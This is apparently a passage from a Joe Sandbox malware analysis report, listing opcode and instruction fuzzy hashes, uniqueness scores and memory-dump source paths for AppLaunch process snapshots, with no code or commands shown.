                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9120000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 7f9b7941cd87b8509db4a436bb2efc58e7857bd00c91a2f55044c6bb053c1685
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5bdc0091bcf9ddb33afe43726e6909560269aa4c3ce44448806f367cbe54e583
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7f9b7941cd87b8509db4a436bb2efc58e7857bd00c91a2f55044c6bb053c1685
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 00E02635205B90CFC7122FB1A4280993F78EE47306744109FE442C6262CBB98800CBD2
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2653231216.0000000009DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DA0000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9da0000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: b45abf0ae8a2eebe6358c22e1f35c9a15f7f585af61e5b2795c0107d21756160
                                                                                                                                                                                                                                                                                                                  • Instruction ID: ff8972e5c03b4c36c32dd6498da23f19b3f79fbce22f35aca5983a8f2f43d688
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b45abf0ae8a2eebe6358c22e1f35c9a15f7f585af61e5b2795c0107d21756160
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3CE03230E0930CEFCB40EFB8D46468CBFB1AB89300F1480EA9808EB350EA345A049B81
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2626382612.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_6a20000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3084b36ecab5432c8c974afdc7640697e1225342e8b4d7ac75ef32f25e7388d5
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 2c91d96a0ad9b35832d5e747e0013c497026fd195f501c53c0c367488823d1b9
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3084b36ecab5432c8c974afdc7640697e1225342e8b4d7ac75ef32f25e7388d5
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A2E04F75A00250CFCB15DB78DE589953BB5EF0A20531904DAE40ADF361EA35ED25CB91
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2626382612.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_6a20000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: b46e98c0696eeaf2493a8bff3a54333077b127a953a506a6e1516298cf31aa43
                                                                                                                                                                                                                                                                                                                  • Instruction ID: e9e90b24c616af2a1881a8067fe0cb492966399d8751e875dfa7063bd5dde530
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b46e98c0696eeaf2493a8bff3a54333077b127a953a506a6e1516298cf31aa43
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 05E0C2356043A15FCB1A6378D8341E53F7ADF8712836C40EFD842CB352DA261806D782
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2626382612.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_6a20000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 35c398d4932a500e8fb5c0571deebdaba6841a2bf9eb39869f609e52eebb3218
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 6c770d11f87a74d265a18dfd54d051f84e1d1ac1c8ec92277d9f20982c658a4c
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 35c398d4932a500e8fb5c0571deebdaba6841a2bf9eb39869f609e52eebb3218
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 64E0C2652943709FC3221BB164421E23FEB4E8206130C469AF881C791AE92C08EAC7F2
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2626382612.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_6a20000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 55f469882e153c4bc20c0a1c095801436790d4f15f27a8c890b24d79f57552db
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 6aa84b946d6cbb6f16ea4c661919fc97ffa8f146ed21c912247cb8fea12bc407
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 55f469882e153c4bc20c0a1c095801436790d4f15f27a8c890b24d79f57552db
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FFE0D8301017118FD328E73AE5506DAFBEAEF85200350D93EC54A43614DFB4B80D4792
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2646148974.0000000009120000.00000040.00000800.00020000.00000000.sdmp, Offset: 09120000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9120000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 24bc5acc7fea4c9b93d0350d91bb870100114dce6a5727c3be74eb5384788574
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 40be219a8883680d3e29d40722b644621920a2d46ec9ecc2ffca3c8a81ed0f9c
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 24bc5acc7fea4c9b93d0350d91bb870100114dce6a5727c3be74eb5384788574
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BBE09230708240CFC7118B24E0604553BB2EF8931431580DDE944CF362EB71DC03DB81
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2626382612.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_6a20000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 4b6ba15e97db94ea13553cd375e9d4fb6767ba091b18b61391d9e9997986d9de
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 7c82c731c6a0b08c01eda07a153bcd203353b77772d62606d04b3f8ff59881cf
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4b6ba15e97db94ea13553cd375e9d4fb6767ba091b18b61391d9e9997986d9de
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 89E0C232A082445FCB05DBB8E86059D3F79DE42220B0404EBC40ACF653EB615D04C7E6
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2626382612.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_6a20000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: e0cf68cc353f4296b439200e5688720ba27ceff13579d53033c135f9e4ca18c5
                                                                                                                                                                                                                                                                                                                  • Instruction ID: a180e8213df444ff6bde2e74a2810f9f75230d60ca5c6bf170126ce814101bfa
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e0cf68cc353f4296b439200e5688720ba27ceff13579d53033c135f9e4ca18c5
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7AE0DF350042209FF712EF24F811B9E7BB1EF4B308B22C289D041CB201D7386816CBE1
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2626382612.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_6a20000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 4609ef9e8f055eaf5e1af40009e5e674f38cca26b909a8b91b5e748af9356d14
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 38e64bb644fea41c7511c2a89650c3297b2d9995ac2caa4ea4ff0a663aa32b4e
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4609ef9e8f055eaf5e1af40009e5e674f38cca26b909a8b91b5e748af9356d14
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 80E02B3190A3989FC712A7B4EE315953F7C8E07210B1801EBD548CF252D6125914C3DA
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2646148974.0000000009120000.00000040.00000800.00020000.00000000.sdmp, Offset: 09120000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9120000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 50c066e8ffae129006ef4fc53c915945022539819a6c0899a972b7ef31c6fa24
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3b9a587bbb576cb58269f285db48d33ea535ba433ba0cfd5842bdcb0ca962583
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 50c066e8ffae129006ef4fc53c915945022539819a6c0899a972b7ef31c6fa24
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ACE08639A493619FC3165B3094068D57FE5EF9126030644AAD4D2DB521D2349C42C7A5
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2646148974.0000000009120000.00000040.00000800.00020000.00000000.sdmp, Offset: 09120000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9120000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: f8ea020ca0a1d3caf125c8f184e51fadd8bd6b38f86c7e13ea1f9663adb5b154
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0fbb6fccc75b509264ee15437da7d54599d739380d7738673f58512f10a4cb79
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f8ea020ca0a1d3caf125c8f184e51fadd8bd6b38f86c7e13ea1f9663adb5b154
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C1E04874E0434D9F9B44EFB584421FE7FF4EB09204F1045AAD949E3315E23056518BC2
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2626382612.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_6a20000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 7469cde2bd923420329df09d9d6a9ddecff2356a26564807c5ea870b0dd8f9f0
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 6dbe297b59f07182d0b8bf95bf6cc42fd0268707599aacd5da0c5f6ffc9b4d74
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7469cde2bd923420329df09d9d6a9ddecff2356a26564807c5ea870b0dd8f9f0
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5DD05B313081645786957779F4186FE37BEDBC5651315042DE507C3640CF652D0147D6
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2646148974.0000000009120000.00000040.00000800.00020000.00000000.sdmp, Offset: 09120000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9120000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 7405a5756d78947b6324d5f059e765f4608d3c51854ec2403723f42a9b589e28
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 2edca7ec8c87ab7c456133dc852fd7a01112a8806bc84f1af34c6bec258a5158
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7405a5756d78947b6324d5f059e765f4608d3c51854ec2403723f42a9b589e28
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 14E09A70E0824CAFCB54EFA9E4545ADBBB5EB45304F4081ADD519A7350EB302A448F85
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2646148974.0000000009120000.00000040.00000800.00020000.00000000.sdmp, Offset: 09120000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9120000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 8ac246cef48f80e57f9a0030e89cd0726e0f9490c2ae8d4e4b522d9ee865d044
                                                                                                                                                                                                                                                                                                                  • Instruction ID: bfe05a8efa6b12e1a4c88b4631765fd12d6fb1f128c88d6b82caaa413e27fab9
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8ac246cef48f80e57f9a0030e89cd0726e0f9490c2ae8d4e4b522d9ee865d044
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 46D0173A601668CBC7242FF5B418099BBACEA49666344406AE80AC2251CBBA9810CBD2
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2646148974.0000000009120000.00000040.00000800.00020000.00000000.sdmp, Offset: 09120000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9120000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 42474dac10852c8ae4023588f33a8e6b7f9b2f95f521d0029f3185b5f0594751
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 4779020e396c0ea381d9476c3381728879ac21b6bd61c29b9010ba83a6cbe1a8
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 42474dac10852c8ae4023588f33a8e6b7f9b2f95f521d0029f3185b5f0594751
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 65E086312557588FD7059B68E4549943BB8EF0A314B0541AAE616CB771EA696C008B85
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2626382612.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_6a20000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3b43fe989729c08ad65836a94eda509663ee0c577309d88170cd8cd2ffeee3f6
                                                                                                                                                                                                                                                                                                                  • Instruction ID: ab9c1c3f09d5f34bffe7df98324ff821356e896a0c72a081c7f59e824113bc58
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3b43fe989729c08ad65836a94eda509663ee0c577309d88170cd8cd2ffeee3f6
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 82E01230A492C08FE73ADB35D0A6A52BFF1EF46608F5584D9D481CB566C63CD895C741
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2646148974.0000000009120000.00000040.00000800.00020000.00000000.sdmp, Offset: 09120000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9120000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1e933f4425196ee2e986884e41c9981df137c6b5094ee434045f06ab8b146df0
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 6dd62a3fae251746dba0221574bfeff2dc2b3adf723a5c59afe4d529ba1ff5b6
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1e933f4425196ee2e986884e41c9981df137c6b5094ee434045f06ab8b146df0
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9BE04631B483964FC705DE39C845CA17FB4EF1A20070941EAE880CB232D621C961CB91
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2653231216.0000000009DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DA0000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9da0000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: a68198738169e9f8e380ab3e69e9058e57d150d5e106e4da844f548e8cdeb5a6
                                                                                                                                                                                                                                                                                                                  • Instruction ID: abb56e6a28221e50e69c0cadcf2bf4a202b6d42f849aa3663db165da3c861cbb
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a68198738169e9f8e380ab3e69e9058e57d150d5e106e4da844f548e8cdeb5a6
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 83E04F74E0528DAFD750EFB8E901A9D7BB9EB4A208F1146E99808D7342F6349E149782
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2653231216.0000000009DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DA0000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9da0000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3e27e3e7070c6f67034339e7411f5023e90ea927199b7eee3907f06f344c583a
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 05787194ab976f0137b6160dc39d15537d63a935a881ec27f65cc2bb105829ea
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3e27e3e7070c6f67034339e7411f5023e90ea927199b7eee3907f06f344c583a
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C6E0B674E0420CEFCB44EFB8E45559DBBF5EB49300F0081E9D809E7350EA346A148F85
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2646148974.0000000009120000.00000040.00000800.00020000.00000000.sdmp, Offset: 09120000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9120000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0e6639de8a5f84647e95c7bfddb9a7b5933d9aed28548e89c07d1e263dcd9524
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 265d5ceff54d215cacb611469105f077ac2ebe5f169b576a3ec31e7fe532213c
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0e6639de8a5f84647e95c7bfddb9a7b5933d9aed28548e89c07d1e263dcd9524
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BEE09974E05208AFCB44EFA9E44859DFBF4AB88200F00C0EAE818E3300EA349A408F81
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2646148974.0000000009120000.00000040.00000800.00020000.00000000.sdmp, Offset: 09120000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9120000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 88b63c7080f4256ce94927e70012a7755bbeb5df2a4edb28669ed67f267c9a9a
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 2e795a7b7c4430b3f67624e2c4aea9e5af0d641e075149a80a087cf8cb7dc3d8
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 88b63c7080f4256ce94927e70012a7755bbeb5df2a4edb28669ed67f267c9a9a
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3EE0C2328052498FCB02EB74D0A44D97FB0EF23320B11629BD481AB011FE200145CB10
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2653231216.0000000009DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DA0000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9da0000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
